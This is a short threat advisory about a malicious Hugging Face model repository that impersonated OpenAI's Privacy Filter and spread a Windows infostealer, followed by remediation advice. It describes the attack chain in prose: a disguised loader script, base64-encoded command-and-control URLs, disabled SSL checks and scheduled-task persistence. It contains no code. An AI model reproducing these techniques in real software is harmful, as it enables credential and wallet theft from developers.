Malicious Hugging Face Model Repository (Open-OSS/privacy-filter)—AI Supply Chain Attack Delivers Infostealer Malware, 244K Downloads

A malicious Hugging Face model repository named 'Open-OSS/privacy-filter' impersonated OpenAI's legitimate Privacy Filter release. The repository achieved #1 trending position on Hugging Face with approximately 244,000 downloads and 667 likes in under 18 hours (likely artificially inflated). The repository included a malicious loader.py file that fetched and executed a Rust-based infostealer targeting Windows hosts, Chromium/Firefox browsers, Discord local storage, cryptocurrency wallets, FileZilla configs, and host system information. The attack chain disabled SSL verification, decoded base64-encoded C2 URLs via jsonkeeper.com, and established persistence via scheduled tasks mimicking Microsoft Edge updates.

Supply chain compromise via public AI model registry. Attackers copy legitimate project metadata, disguise malicious loader as normal setup script, and abuse Hugging Face's early trust period before removal. Developers/data scientists cloning models directly into corporate environments with elevated access provide initial infection vector.

Any organization cloning models directly from Hugging Face into development, data science, or production environments without code review. Particularly high-risk: enterprises allowing developers to execute arbitrary Python scripts during model setup. Six additional malicious repositories using identical loader logic and shared infrastructure were identified, suggesting a coordinated campaign.

Immediate: (1) audit Hugging Face clones in your environment for suspicious loader.py or similar setup scripts; (2) review execution logs for jsonkeeper.com or attacker-controlled domain communications; (3) isolate and rebuild affected systems; (4) rotate all credentials potentially exposed (browser passwords, Discord tokens, crypto wallets, cloud creds). Longer-term: (1) require code review before executing any model setup scripts; (2) isolate model-loading environments from corporate network; (3) use container scanning and binary analysis before model deployment; (4) monitor Hugging Face for typosquatting and impersonation; (5) implement software supply chain controls (SBOM, signed artifacts, provenance verification) for AI models equivalent to traditional software.